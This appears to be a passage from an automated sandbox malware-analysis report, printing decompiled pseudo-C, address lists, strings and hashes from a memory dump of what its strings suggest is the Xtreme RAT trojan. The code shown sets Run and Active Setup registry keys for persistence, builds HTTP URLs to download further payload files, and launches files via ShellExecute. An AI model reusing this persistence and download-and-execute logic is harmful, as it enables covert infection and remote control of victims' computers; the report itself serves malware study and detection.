							E10003988( &_v5668, L".exe", _v12, __eflags);
							__eflags = E10005EB4(E1000390C(_v5668), L"OK", 4, 0);
							if(__eflags != 0) {
								_t281 = _v12;
								E10003988( &_v5680, L".xtr", _t281, __eflags);
								_push(E1000390C(_v5680));
								L10004E30();
							} else {
								E10005324( &_v5672);
								_push(_v5672);
								_push(E1000BCA4);
								E100038E0( &_v5676, 0x105, _t230);
								_push(_v5676);
								_t281 = 3;
								E100039EC();
							}
							_t149 = E1000391C(_v16);
							asm("cdq");
							_push(_t281);
							_push(_t149 + _t149);
							_push(E1000390C(_v16));
							_t313 = E1000390C(_v12);
							_pop(_t282);
							E10005EB4(_t313, _t282);
							_t157 =  *((intOrPtr*)(_t230 + 0x21c));
							__eflags = _t157 - 2;
							if(_t157 != 2) {
								__eflags = _t157 - 1;
								if(_t157 != 1) {
									__eflags = _t157;
									if(_t157 == 0) {
										_push(1);
										_push(0);
										_push(0);
										_push(_t313);
										_push(L"open");
										_push(0);
										L1000B6F8();
									}
								} else {
									_push(0);
									_push(0);
									_push(0);
									_push(_t313);
									_push(L"open");
									_push(0);
									L1000B6F8();
								}
							}
							continue;
						}
						_push(0);
						_push( &_v5588);
						E100038E0( &_v5592, 0x105, _t230);
						_push(_v5592);
						E100034B0( &_v5604, 0x3d,  &_v1018);
						E1000352C( &_v5600, _v5604, "SOFTWARE\\");
						E100038FC( &_v5596, _v5600);
						_pop(_t255);
						E1000553C(0x80000001, _t230, _t255, _v5596, _t313);
						E10003A34(_v5588, E1000BC98);
						if(__eflags == 0) {
							continue;
						} else {
							_push(E1000BC98);
							_push(2);
							E100038E0( &_v5608, 0x105, _t230);
							_push(_v5608);
							E100034B0( &_v5620, 0x3d,  &_v1018);
							E1000352C( &_v5616, _v5620, "SOFTWARE\\");
							E100038FC( &_v5612, _v5616);
							_pop(_t259);
							E1000577C(0x80000001, _t230, _t259, _v5612, _t313, __eflags);
							goto L9;
						}
					}
					goto L29;
				}
				L1:
				_push(0);
				_push(0);
				_t231 = _t231 - 1;
				if(_t231 != 0) {
					goto L1;
				} else {
					_push(_t231);
					_t313 = __eax;
					memcpy( &_v5028, __eax, 0x4e4 << 2);
					_t311 = _t313 + 0x9c8;
					_t230 =  &_v5580;
					_push(_t315);
					_push(0x1000bc5d);
					_push( *[fs:eax]);
					 *[fs:eax] = _t316 + 0xc;
					E1000B700( &_v8);
					E10003A34(_v8, 0);
					if(0 != 0) {
						E10006404(_v8, _t230,  &_v5584, L"BINDER", _t313, 0);
						E100037D0( &_v8, _v5584);
					}
					goto L4;
				}
			}

0x1000b78d
0x1000b78f
0x1000b78f
0x1000b7f7
0x1000b7fc
0x1000b801
0x1000bbf2
0x1000bbf4
0x1000bbf7
0x1000bbfa
0x1000bc0a
0x1000bc1a
0x1000bc2a
0x1000bc3a
0x1000bc4a
0x1000bc5c
0x1000b807
0x1000bbe2
0x1000bbe7
0x1000bbec
0x00000000
0x00000000
0x1000b80f
0x1000b817
0x1000b823
0x1000b839
0x1000b84b
0x1000b873
0x1000b897
0x1000b89c
0x1000b8a3
0x1000b99d
0x1000b99d
0x1000b9a3
0x1000b9a5
0x1000b9df
0x1000b9e2
0x1000ba1c
0x1000ba1f
0x1000ba59
0x1000ba5c
0x1000ba93
0x1000ba96
0x1000ba9e
0x1000baa9
0x1000baab
0x1000bab0
0x1000bab8
0x1000babd
0x1000bac3
0x1000bad5
0x1000bada
0x1000bae8
0x1000bae8
0x1000bab0
0x1000ba5e
0x1000ba6b
0x1000ba76
0x1000ba7d
0x1000ba8b
0x1000ba8c
0x1000ba8c
0x1000ba21
0x1000ba2e
0x1000ba39
0x1000ba40
0x1000ba4e
0x1000ba4f
0x1000ba4f
0x1000b9e4
0x1000b9f1
0x1000b9fc
0x1000ba03
0x1000ba11
0x1000ba12
0x1000ba12
0x1000b9a7
0x1000b9b4
0x1000b9bf
0x1000b9c6
0x1000b9d4
0x1000b9d5
0x1000b9d5
0x1000baff
0x1000bb19
0x1000bb1b
0x1000bb65
0x1000bb68
0x1000bb78
0x1000bb79
0x1000bb1d
0x1000bb23
0x1000bb28
0x1000bb2e
0x1000bb40
0x1000bb45
0x1000bb4e
0x1000bb53
0x1000bb53
0x1000bb81
0x1000bb88
0x1000bb89
0x1000bb8a
0x1000bb93
0x1000bb9c
0x1000bba0
0x1000bba1
0x1000bba6
0x1000bbac
0x1000bbaf
0x1000bbb1
0x1000bbb4
0x1000bbcb
0x1000bbcd
0x1000bbcf
0x1000bbd1
0x1000bbd3
0x1000bbd5
0x1000bbd6
0x1000bbdb
0x1000bbdd
0x1000bbdd
0x1000bbb6
0x1000bbb6
0x1000bbb8
0x1000bbba
0x1000bbbc
0x1000bbbd
0x1000bbc2
0x1000bbc4
0x1000bbc4
0x1000bbb4
0x00000000
0x1000bbaf
0x1000b8a9
0x1000b8b1
0x1000b8bf
0x1000b8ca
0x1000b8dc
0x1000b8f2
0x1000b903
0x1000b913
0x1000b914
0x1000b924
0x1000b929
0x00000000
0x1000b92f
0x1000b92f
0x1000b934
0x1000b943
0x1000b94e
0x1000b960
0x1000b976
0x1000b987
0x1000b997
0x1000b998
0x00000000
0x1000b998
0x1000b929
0x00000000
0x1000bbe2
0x1000b794
0x1000b794
0x1000b796
0x1000b798
0x1000b799
0x00000000
0x1000b79b
0x1000b79b
0x1000b79f
0x1000b7ac
0x1000b7ac
0x1000b7ae
0x1000b7b6
0x1000b7b7
0x1000b7bc
0x1000b7bf
0x1000b7c5
0x1000b7cf
0x1000b7d4
0x1000b7e4
0x1000b7f2
0x1000b7f2
0x00000000
0x1000b7d4

Strings

SOFTWARE\, xrefs: 1000B8ED, 1000B971
.exe, xrefs: 1000BAF7
.xtr, xrefs: 1000BB60
BINDER, xrefs: 1000B7DC
open, xrefs: 1000BBBD, 1000BBD6

Memory Dump Source

Source File: 00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Yara matches

Similarity

API ID:
String ID: .exe$.xtr$BINDER$SOFTWARE\$open
API String ID: 0-3085899294
Opcode ID: a17296029010211923f33a32a025bfe9590920d378f998e5d8a670387b69a70f
Instruction ID: e2e431fa4438d6138b358157023902ea7bce804184865157e4dc89de6df5abab
Opcode Fuzzy Hash: a17296029010211923f33a32a025bfe9590920d378f998e5d8a670387b69a70f
Instruction Fuzzy Hash: 33C11C38A005199BFB25DB54CC82BCFB3B9EB84381F5080B5B509AB249DE75FE858F51

Uniqueness

Uniqueness Score: -1.00%

Function 10009E6C, Relevance: 6.4, Strings: 5, Instructions: 162
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E10009E6C(intOrPtr* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				intOrPtr _v117;
				void _v1264;
				char _v1386;
				char _v1508;
				char _v1509;
				char _v1510;
				char _v1511;
				char _v1512;
				char _v1634;
				char _v1756;
				char _v1878;
				char _v1880;
				void _v5028;
				char _v5032;
				char _v5036;
				char _v5040;
				char _v5044;
				char _v5048;
				char _v5052;
				char _v5056;
				char _v5060;
				void _v5184;
				char _v5188;
				char _v5192;
				intOrPtr* _t61;
				void* _t91;
				void* _t129;
				intOrPtr _t155;
				void* _t191;
				void* _t192;
				void* _t202;

				_t127 = __ebx;
				_t61 = __eax +  *__eax;
				 *_t61 =  *_t61 + _t61;
				_pop(_t192);
				 *_t61 =  *_t61 + _t61;
				_v117 = _v117 + __edx;
				_t191 = _t192;
				_t129 = 0x288;
				do {
					_push(0);
					_push(0);
					_t129 = _t129 - 1;
				} while (_t129 != 0);
				_push(_t129);
				_push(__ebx);
				_t189 = __edx;
				_v8 = memcpy( &_v5028, __edx, 0x4e4 << 2);
				E10003C28( &_v8);
				_push(_t191);
				_push(0x1000a113);
				_push( *[fs:eax]);
				 *[fs:eax] = _t192 + 0xc;
				if(_v1880 != 0) {
					_t199 = _v1512 - 1;
					if(_v1512 == 1) {
						E100038E0( &_v5032, 0x3d,  &_v1878);
						E1000577C(0x80000002, __ebx, _v5032, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", _t189, _t199, 2, _v8);
					}
					_t200 = _v1511 - 1;
					if(_v1511 == 1) {
						E100038E0( &_v5036, 0x3d,  &_v1756);
						E1000577C(0x80000001, _t127, _v5036, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", _t189, _t200, 2, _v8);
					}
					_t201 = _v1510 - 1;
					if(_v1510 == 1) {
						E100038E0( &_v5044, 0x3d,  &_v1634);
						E10003988( &_v5040, _v5044, L"Software\\Microsoft\\Active Setup\\Installed Components\\", _t201);
						E100059E8(0x80000001, _t127, _v5040, _t201);
						E10003988( &_v5048, L" restart", _v8, _t201);
						E100038E0( &_v5056, 0x3d,  &_v1634);
						E10003988( &_v5052, _v5056, L"Software\\Microsoft\\Active Setup\\Installed Components\\", _t201);
						E1000577C(0x80000002, _t127, L"StubPath", _v5052, _t189, _t201, 2, _v5048);
					}
					_t202 = _v1509 - 1;
					if(_t202 == 0) {
						E100034B0( &_v5060, 0x3d,  &_v1264);
						E1000362C(_v5060, "%SERVER%");
						if(_t202 == 0) {
							E10005240(_v8, _t127, 0x3d,  &_v5184);
							_t189 =  &_v5184;
							memcpy( &_v1264,  &_v5184, 0x1e << 2);
							asm("movsw");
						}
						E100038E0( &_v16, 0x3d,  &_v1508);
						E10003AB8(_v16, E10003B94(0x1000a23c, _v16) - 1, 1, E10003B94(0x1000a23c, _v16) - 1,  &_v12);
						E10003B04( &_v16, E10003B94(0x1000a23c, _v16), 1, E10003B94(0x1000a23c, _v16) - 1);
						_t91 = E10005A94(_v12, _t127, _t87);
						E100038E0( &_v5188, 0x3d,  &_v1264);
						E100038E0( &_v5192, 0x3d,  &_v1386);
						E1000577C(_t91, _t91, _v5192, _v16, _t189, E10003B94(0x1000a23c, _v16) - 1, 2, _v5188);
					}
				}
				_pop(_t155);
				 *[fs:eax] = _t155;
				_push(E1000A11A);
				E10003788( &_v5192, 2);
				E100032CC( &_v5060);
				E10003788( &_v5056, 7);
				return E10003788( &_v16, 3);
			}

Strings

StubPath, xrefs: 10009FC7
restart, xrefs: 10009F7F
Software\Microsoft\Active Setup\Installed Components\, xrefs: 10009F5F, 10009FB7
%SERVER%, xrefs: 10009FFF
Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 10009EE7, 10009F21

Memory Dump Source

Source File: 00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Yara matches

Similarity

API ID:
String ID: restart$%SERVER%$Software\Microsoft\Active Setup\Installed Components\$Software\Microsoft\Windows\CurrentVersion\Run$StubPath
API String ID: 0-2142522223
Opcode ID: 364ad897bbca38481dd1a11b2b492bd1a693bcb91c63773ed721ecd4ba2295bf
Instruction ID: ccd5ba8bb55e14e3b401f0629b5d5422583a699d941ac8acb34279bb9c56e552
Opcode Fuzzy Hash: 364ad897bbca38481dd1a11b2b492bd1a693bcb91c63773ed721ecd4ba2295bf
Instruction Fuzzy Hash: A4619438A0415D9FEB25C750C881BDEB3BEEF45380F8081D6A908A768ADB756F85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 10009E70, Relevance: 6.4, Strings: 5, Instructions: 160
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E10009E70(intOrPtr* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				intOrPtr _v117;
				void _v1264;
				char _v1386;
				char _v1508;
				char _v1509;
				char _v1510;
				char _v1511;
				char _v1512;
				char _v1634;
				char _v1756;
				char _v1878;
				char _v1880;
				void _v5028;
				char _v5032;
				char _v5036;
				char _v5040;
				char _v5044;
				char _v5048;
				char _v5052;
				char _v5056;
				char _v5060;
				void _v5184;
				char _v5188;
				char _v5192;
				void* _t90;
				void* _t128;
				intOrPtr _t154;
				void* _t190;
				void* _t191;
				void* _t200;

				_t126 = __ebx;
				_pop(_t191);
				 *__eax =  *__eax + __eax;
				_v117 = _v117 + __edx;
				_t190 = _t191;
				_t128 = 0x288;
				do {
					_push(0);
					_push(0);
					_t128 = _t128 - 1;
				} while (_t128 != 0);
				_push(_t128);
				_push(__ebx);
				_t188 = __edx;
				_v8 = memcpy( &_v5028, __edx, 0x4e4 << 2);
				E10003C28( &_v8);
				_push(_t190);
				_push(0x1000a113);
				_push( *[fs:eax]);
				 *[fs:eax] = _t191 + 0xc;
				if(_v1880 != 0) {
					_t197 = _v1512 - 1;
					if(_v1512 == 1) {
						E100038E0( &_v5032, 0x3d,  &_v1878);
						E1000577C(0x80000002, __ebx, _v5032, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", _t188, _t197, 2, _v8);
					}
					_t198 = _v1511 - 1;
					if(_v1511 == 1) {
						E100038E0( &_v5036, 0x3d,  &_v1756);
						E1000577C(0x80000001, _t126, _v5036, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", _t188, _t198, 2, _v8);
					}
					_t199 = _v1510 - 1;
					if(_v1510 == 1) {
						E100038E0( &_v5044, 0x3d,  &_v1634);
						E10003988( &_v5040, _v5044, L"Software\\Microsoft\\Active Setup\\Installed Components\\", _t199);
						E100059E8(0x80000001, _t126, _v5040, _t199);
						E10003988( &_v5048, L" restart", _v8, _t199);
						E100038E0( &_v5056, 0x3d,  &_v1634);
						E10003988( &_v5052, _v5056, L"Software\\Microsoft\\Active Setup\\Installed Components\\", _t199);
						E1000577C(0x80000002, _t126, L"StubPath", _v5052, _t188, _t199, 2, _v5048);
					}
					_t200 = _v1509 - 1;
					if(_t200 == 0) {
						E100034B0( &_v5060, 0x3d,  &_v1264);
						E1000362C(_v5060, "%SERVER%");
						if(_t200 == 0) {
							E10005240(_v8, _t126, 0x3d,  &_v5184);
							_t188 =  &_v5184;
							memcpy( &_v1264,  &_v5184, 0x1e << 2);
							asm("movsw");
						}
						E100038E0( &_v16, 0x3d,  &_v1508);
						E10003AB8(_v16, E10003B94(0x1000a23c, _v16) - 1, 1, E10003B94(0x1000a23c, _v16) - 1,  &_v12);
						E10003B04( &_v16, E10003B94(0x1000a23c, _v16), 1, E10003B94(0x1000a23c, _v16) - 1);
						_t90 = E10005A94(_v12, _t126, _t86);
						E100038E0( &_v5188, 0x3d,  &_v1264);
						E100038E0( &_v5192, 0x3d,  &_v1386);
						E1000577C(_t90, _t90, _v5192, _v16, _t188, E10003B94(0x1000a23c, _v16) - 1, 2, _v5188);
					}
				}
				_pop(_t154);
				 *[fs:eax] = _t154;
				_push(E1000A11A);
				E10003788( &_v5192, 2);
				E100032CC( &_v5060);
				E10003788( &_v5056, 7);
				return E10003788( &_v16, 3);
			}

Strings

StubPath, xrefs: 10009FC7
restart, xrefs: 10009F7F
Software\Microsoft\Active Setup\Installed Components\, xrefs: 10009F5F, 10009FB7
%SERVER%, xrefs: 10009FFF
Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 10009EE7, 10009F21

Memory Dump Source

Source File: 00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Yara matches

Similarity

API ID:
String ID: restart$%SERVER%$Software\Microsoft\Active Setup\Installed Components\$Software\Microsoft\Windows\CurrentVersion\Run$StubPath
API String ID: 0-2142522223
Opcode ID: 70bc63b1d7bf7f2434c0fd2a984a390c0a29f6a211df66fcb658c6ec4d215a6a
Instruction ID: 7bb9cab796adacb123c590501e10766ab110edc906df9b0df81ab3aad42e102a
Opcode Fuzzy Hash: 70bc63b1d7bf7f2434c0fd2a984a390c0a29f6a211df66fcb658c6ec4d215a6a
Instruction Fuzzy Hash: 23619438A0415D9BEB25C750C881BDEB3BEEF45380F8081D6A908A764ADB756F85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 10009E74, Relevance: 6.4, Strings: 5, Instructions: 158
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E10009E74(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				void _v1264;
				char _v1386;
				char _v1508;
				char _v1509;
				char _v1510;
				char _v1511;
				char _v1512;
				char _v1634;
				char _v1756;
				char _v1878;
				char _v1880;
				void _v5028;
				char _v5032;
				char _v5036;
				char _v5040;
				char _v5044;
				char _v5048;
				char _v5052;
				char _v5056;
				char _v5060;
				void _v5184;
				char _v5188;
				char _v5192;
				void* _t87;
				void* _t125;
				intOrPtr _t151;
				void* _t187;
				void* _t188;
				void* _t196;

				_t123 = __ebx;
				_t187 = _t188;
				_t125 = 0x288;
				do {
					_push(0);
					_push(0);
					_t125 = _t125 - 1;
				} while (_t125 != 0);
				_push(_t125);
				_push(__ebx);
				_t185 = __edx;
				_v8 = memcpy( &_v5028, __edx, 0x4e4 << 2);
				E10003C28( &_v8);
				_push(_t187);
				_push(0x1000a113);
				_push( *[fs:eax]);
				 *[fs:eax] = _t188 + 0xc;
				if(_v1880 != 0) {
					_t193 = _v1512 - 1;
					if(_v1512 == 1) {
						E100038E0( &_v5032, 0x3d,  &_v1878);
						E1000577C(0x80000002, __ebx, _v5032, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", _t185, _t193, 2, _v8);
					}
					_t194 = _v1511 - 1;
					if(_v1511 == 1) {
						E100038E0( &_v5036, 0x3d,  &_v1756);
						E1000577C(0x80000001, _t123, _v5036, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", _t185, _t194, 2, _v8);
					}
					_t195 = _v1510 - 1;
					if(_v1510 == 1) {
						E100038E0( &_v5044, 0x3d,  &_v1634);
						E10003988( &_v5040, _v5044, L"Software\\Microsoft\\Active Setup\\Installed Components\\", _t195);
						E100059E8(0x80000001, _t123, _v5040, _t195);
						E10003988( &_v5048, L" restart", _v8, _t195);
						E100038E0( &_v5056, 0x3d,  &_v1634);
						E10003988( &_v5052, _v5056, L"Software\\Microsoft\\Active Setup\\Installed Components\\", _t195);
						E1000577C(0x80000002, _t123, L"StubPath", _v5052, _t185, _t195, 2, _v5048);
					}
					_t196 = _v1509 - 1;
					if(_t196 == 0) {
						E100034B0( &_v5060, 0x3d,  &_v1264);
						E1000362C(_v5060, "%SERVER%");
						if(_t196 == 0) {
							E10005240(_v8, _t123, 0x3d,  &_v5184);
							_t185 =  &_v5184;
							memcpy( &_v1264,  &_v5184, 0x1e << 2);
							asm("movsw");
						}
						E100038E0( &_v16, 0x3d,  &_v1508);
						E10003AB8(_v16, E10003B94(0x1000a23c, _v16) - 1, 1, E10003B94(0x1000a23c, _v16) - 1,  &_v12);
						E10003B04( &_v16, E10003B94(0x1000a23c, _v16), 1, E10003B94(0x1000a23c, _v16) - 1);
						_t87 = E10005A94(_v12, _t123, _t83);
						E100038E0( &_v5188, 0x3d,  &_v1264);
						E100038E0( &_v5192, 0x3d,  &_v1386);
						E1000577C(_t87, _t87, _v5192, _v16, _t185, E10003B94(0x1000a23c, _v16) - 1, 2, _v5188);
					}
				}
				_pop(_t151);
				 *[fs:eax] = _t151;
				_push(E1000A11A);
				E10003788( &_v5192, 2);
				E100032CC( &_v5060);
				E10003788( &_v5056, 7);
				return E10003788( &_v16, 3);
			}

Strings

StubPath, xrefs: 10009FC7
restart, xrefs: 10009F7F
Software\Microsoft\Active Setup\Installed Components\, xrefs: 10009F5F, 10009FB7
%SERVER%, xrefs: 10009FFF
Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 10009EE7, 10009F21

Memory Dump Source

Source File: 00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Yara matches

Similarity

API ID:
String ID: restart$%SERVER%$Software\Microsoft\Active Setup\Installed Components\$Software\Microsoft\Windows\CurrentVersion\Run$StubPath
API String ID: 0-2142522223
Opcode ID: 6a3a9802c04267f5677fb71fa8e26ddd48aad684d5027258f0195948b13e5c11
Instruction ID: 51db14d9a78096dfca6e0b2c0cac839b55e5a7d9a5be764b8c5632986f08cd1f
Opcode Fuzzy Hash: 6a3a9802c04267f5677fb71fa8e26ddd48aad684d5027258f0195948b13e5c11
Instruction Fuzzy Hash: B5619338A0415D9BEB15D750C841BDEB3BEEF45380F8081E6A908A7249DB75AF85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 1000A54F, Relevance: 6.4, Strings: 5, Instructions: 127
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E1000A54F(void* __eax, void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi, void* __eflags) {
				char _v4;
				void* _v8;
				char _v9;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v2516;
				intOrPtr _v2520;
				char _v4960;
				char _v5040;
				void _v5044;
				char _v5048;
				char _v5052;
				intOrPtr _v5056;
				char _v5060;
				char _v5064;
				char _v5068;
				char _v5072;
				char _v5076;
				char _v5080;
				char _v5084;
				void* _t107;
				void* _t146;
				void* _t150;
				intOrPtr _t160;
				void* _t180;
				void* _t185;
				void* _t207;
				void* _t225;
				char* _t226;
				intOrPtr _t241;
				intOrPtr _t245;
				char _t246;
				intOrPtr _t249;
				void* _t259;
				char* _t260;
				char _t273;
				void* _t274;
				char* _t275;
				intOrPtr _t288;
				intOrPtr* _t293;
				signed int _t294;
				void* _t295;
				void* _t296;

				_t292 = __esi;
				_t246 = __edx;
				_t102 = __eax;
				_push(__eax);
				asm("insb");
				if(__eflags == 0) {
					_t294 =  *(__esi - 0x73) * 0x8b550040;
					_push(_t294);
					_t295 = _t296;
					_t241 = 0x27b;
					do {
						_push(0);
						_push(0);
						_t241 = _t241 - 1;
					} while (_t241 != 0);
					_t2 =  &_v8;
					 *_t2 = _t241;
					_push(__ebx);
					_push(__esi);
					_t292 = __eax;
					_push( *_t2);
					memcpy( &_v5044, __eax, 0x4e4 << 2);
					_pop(_t245);
					_v12 = _t245;
					_v8 = _t246;
					E10003C28( &_v8);
					_push(_t295);
					_push(0x1000a98b);
					_push( *[fs:eax]);
					 *[fs:eax] = _t296 + 0xc;
					E10003770(_v12);
					_push("URLMON.DLL");
					L10004EE8();
					_push("shell32.dll");
					L10004EE8();
					_t102 =  &_v24;
				}
				E100037D0(_t102, L"XTREME");
				_v9 = 0;
				_t225 = E1000390C(_v4);
				_t107 = E10005CA4(_t225);
				_t302 = _t107;
				if(_t107 == 0) {
					L10:
					_t288 = 0x14;
					_t226 =  &_v4960;
					_t293 =  &_v5040;
					do {
						E100034B0( &_v5048, 0x3d, _t226);
						__eflags = _v5048;
						if(_v5048 != 0) {
							__eflags =  *_t293;
							if( *_t293 > 0) {
								_push("http://");
								E100034B0( &_v5060, 0x3d, _t226);
								_push(_v5060);
								_push(0x1000aa2c);
								E100035A0();
								_t255 = _v5056;
								E100038FC( &_v5052, _v5056);
								_push(_v5052);
								asm("cdq");
								E10005CCC( &_v5064, 0x3d, _v5056,  *_t293, _t255);
								_push(_v5064);
								_push(0x1000aa34);
								E10005CCC( &_v5068, 0x3d, _t255, _v2520, _v2516);
								_push(_v5068);
								_push(L".functions");
								E100039EC();
								E10003898( &_v5072, E1000390C(_v4));
								_push(_v5072);
								E10003898( &_v5076, E1000390C(_v16));
								_pop(_t259);
								_t146 = E10005F88(_v5076, _t226, _t259);
								__eflags = _t146 - 1;
								if(_t146 != 1) {
									_push(E1000390C(_v4));
									L10004E30();
								} else {
									_t150 = E1000390C(_v4);
									_t260 =  &_v24;
									_v32 = E10005E30(_t150, _t260);
									_v28 = _t260;
									__eflags = _v28;
									if(__eflags != 0) {
										if(__eflags > 0) {
											goto L18;
										}
									} else {
										__eflags = _v32;
										if(_v32 > 0) {
											L18:
											E10003BE4( &_v16, E10003FD4(_v32, _v28, 2, 0));
											E100050D0(E1000390C(_v16), _v24);
											_t160 = E10003B94(L"STARTSERVERBUFFER", _v16);
											__eflags = _t160;
											if(_t160 > 0) {
												__eflags = E10003B94(L"ENDSERVERBUFFER", _v16);
												if(__eflags > 0) {
													E10003B04( &_v16, 0x11, 1, __eflags);
													E10003B04( &_v16, 0xf, E1000391C(_v16) - 0xf, __eflags);
													E10006234(_v16, _t226,  &_v5080, _v20, _t293, __eflags);
													E100037AC(_v8, _v5080);
													_push(L"STARTSERVERBUFFER");
													_push( *_v8);
													_push(L"ENDSERVERBUFFER");
													E100039EC();
													E10006234(_v16, _t226,  &_v5084, _v20, _t293, __eflags);
													_t273 = _v5084;
													E100037D0( &_v16, _t273);
													_t180 = E1000391C(_v16);
													asm("cdq");
													_push(_t273);
													_push(_t180 + _t180);
													_push(E1000390C(_v16));
													_t185 = E1000390C(_v4);
													_pop(_t274);
													E10005EB4(_t185, _t274);
													E10005F1C(_v4, _t226,  &_v5084, _t293);
													_v9 = 1;
												}
											}
										}
									}
								}
							}
						}
						_t293 = _t293 + 4;
						_t226 = _t226 + 0x7a;
						_t288 = _t288 - 1;
						__eflags = _t288;
					} while (_t288 != 0);
				} else {
					_push(0x80);
					_push(_t225);
					L10004F30();
					_t275 =  &_v24;
					_v32 = E10005E30(_t225, _t275);
					_v28 = _t275;
					E10003BE4( &_v16, E10003FD4(_v32, _v28, 2, 0));
					E100050D0(E1000390C(_v16), _v24);
					E10006234(_v16, _t225,  &_v5044, _v20, _t292, _t302);
					E100037D0( &_v16, _v5044);
					if(E10003B94(L"STARTSERVERBUFFER", _v16) <= 0) {
						L9:
						_push(E1000390C(_v4));
						L10004E30();
						goto L10;
					} else {
						_t207 = E10003B94(L"ENDSERVERBUFFER", _v16);
						_t304 = _t207;
						if(_t207 <= 0) {
							goto L9;
						} else {
							E10005F1C(_v4, _t225,  &_v5044, _t292);
							E10003B04( &_v16, 0x11, 1, _t304);
							E10003B04( &_v16, 0xf, E1000391C(_v16) - 0xf, _t304);
							E100037AC(_v8, _v16);
							_v9 = 1;
						}
					}
				}
				_pop(_t249);
				 *[fs:eax] = _t249;
				_push(E1000A992);
				E10003788( &_v5084, 6);
				E100032F0( &_v5060, 2);
				E10003770( &_v5052);
				E100032CC( &_v5048);
				E10003770( &_v5044);
				E10003788( &_v20, 2);
				return E10003770( &_v4);
			}

0x1000a54f
0x1000a54f
0x1000a54f
0x1000a54f
0x1000a550
0x1000a551
0x1000a553
0x1000a558
0x1000a559
0x1000a55c
0x1000a561
0x1000a561
0x1000a563
0x1000a565
0x1000a565
0x1000a568
0x1000a568
0x1000a56b
0x1000a56c
0x1000a56e
0x1000a576
0x1000a57c
0x1000a57e
0x1000a57f
0x1000a582
0x1000a588
0x1000a58f
0x1000a590
0x1000a595
0x1000a598
0x1000a59e
0x1000a5a3
0x1000a5a8
0x1000a5ad
0x1000a5b2
0x1000a5b7
0x1000a5b7
0x1000a5bf
0x1000a5c4
0x1000a5d0
0x1000a5d4
0x1000a5d9
0x1000a5db
0x1000a6bf
0x1000a6bf
0x1000a6c4
0x1000a6ca
0x1000a6d0
0x1000a6dd
0x1000a6e2
0x1000a6e9
0x1000a6ef
0x1000a6f2
0x1000a6f8
0x1000a70a
0x1000a70f
0x1000a715
0x1000a725
0x1000a72a
0x1000a736
0x1000a73b
0x1000a743
0x1000a74c
0x1000a751
0x1000a757
0x1000a76e
0x1000a773
0x1000a779
0x1000a786
0x1000a79b
0x1000a7a6
0x1000a7b7
0x1000a7c2
0x1000a7c3
0x1000a7c8
0x1000a7ca
0x1000a914
0x1000a915
0x1000a7d0
0x1000a7d3
0x1000a7d8
0x1000a7e0
0x1000a7e3
0x1000a7e6
0x1000a7ea
0x1000a7f8
0x00000000
0x00000000
0x1000a7ec
0x1000a7ec
0x1000a7f0
0x1000a7fe
0x1000a812
0x1000a825
0x1000a832
0x1000a837
0x1000a839
0x1000a84c
0x1000a84e
0x1000a861
0x1000a87b
0x1000a88c
0x1000a89a
0x1000a89f
0x1000a8a7
0x1000a8a9
0x1000a8b6
0x1000a8c7
0x1000a8cc
0x1000a8d5
0x1000a8dd
0x1000a8e4
0x1000a8e5
0x1000a8e6
0x1000a8ef
0x1000a8f3
0x1000a8f8
0x1000a8f9
0x1000a901
0x1000a906
0x1000a906
0x1000a84e
0x1000a839
0x1000a7f0
0x1000a7ea
0x1000a7ca
0x1000a6f2
0x1000a91a
0x1000a91d
0x1000a920
0x1000a920
0x1000a920
0x1000a5e1
0x1000a5e1
0x1000a5e6
0x1000a5e7
0x1000a5ee
0x1000a5f6
0x1000a5f9
0x1000a610
0x1000a623
0x1000a634
0x1000a642
0x1000a656
0x1000a6b1
0x1000a6b9
0x1000a6ba
0x00000000
0x1000a658
0x1000a660
0x1000a665
0x1000a667
0x00000000
0x1000a669
0x1000a66c
0x1000a67e
0x1000a698
0x1000a6a3
0x1000a6a8
0x1000a6a8
0x1000a667
0x1000a656
0x1000a929
0x1000a92c
0x1000a92f
0x1000a93f
0x1000a94f
0x1000a95a
0x1000a965
0x1000a970
0x1000a97d
0x1000a98a

Strings

XTREME, xrefs: 1000A5BA
shell32.dll, xrefs: 1000A5AD
STARTSERVERBUFFER, xrefs: 1000A64A
URLMON.DLL, xrefs: 1000A5A3
ENDSERVERBUFFER, xrefs: 1000A65B

Memory Dump Source

Source File: 00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Yara matches

Similarity

API ID:
String ID: ENDSERVERBUFFER$STARTSERVERBUFFER$URLMON.DLL$XTREME$shell32.dll
API String ID: 0-2417524110
Opcode ID: 713050decec376a8e5de2e79cbc70c6421a00f6f369ebb3c5e82f8a6782ac755
Instruction ID: 30b3ef76a2a80ae0936852672a2bbee531ad642fb2a80bd77bca9c30e5cd02f7
Opcode Fuzzy Hash: 713050decec376a8e5de2e79cbc70c6421a00f6f369ebb3c5e82f8a6782ac755
Instruction Fuzzy Hash: 7F418D78A141199BEB11DBA4CC82BEFB3B9FF44380F508165F504A728ADB34BE418B64

Uniqueness

Uniqueness Score: -1.00%

